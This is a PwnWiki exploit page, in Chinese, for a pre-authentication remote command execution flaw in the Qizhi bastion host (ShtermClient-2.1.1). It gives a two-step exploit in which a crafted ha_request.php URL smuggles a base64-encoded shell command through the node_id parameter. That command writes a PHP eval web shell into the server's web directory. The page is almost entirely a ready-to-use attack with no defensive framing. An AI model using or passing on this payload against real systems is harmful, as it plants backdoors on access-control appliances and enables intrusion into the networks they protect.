齐治堡垒机前台远程命令执行漏洞

This page is a translated version of the page 齊治堡壘機前台遠程命令執行漏洞 and the translation is 100% complete.

Other languages:

Chinese • ‎中文（中国大陆）‎ • ‎中文（简体）‎ • ‎中文（繁體）‎

漏洞影响

ShtermClient-2.1.1

漏洞利用

1.訪問 http://10.20.10.11/listener/cluster\_manage.php 返回OK；

2.訪問如下鏈接生成一句話木馬

https://10.20.10.10/ha_request.php?action=install&ipaddr=10.20.10.11&node_id=1${IFS}|`echo${IFS}"ZWNobyAnPD9waHAgQGV2YWwoJF9SRVFVRVNUW3NoZWxsXSk7Pz4nPj4vdmFyL3d3dy9zaHRlcm0vcmVzb3VyY2VzL3FyY29kZS9zaGVsbC5waHA="|base64${IFS}-d|bash`|${IFS}|echo${IFS}

Anonymous

Search

齐治堡垒机前台远程命令执行漏洞

Namespaces

More

Page actions

漏洞影响

漏洞利用

漏洞利用

Navigation

Navigation

Community

PwnWiki.org

Wiki tools

Wiki tools

Anonymous

Search

齐治堡垒机前台远程命令执行漏洞

漏洞影响

漏洞利用

漏洞利用

Navigation

Wiki tools

Page tools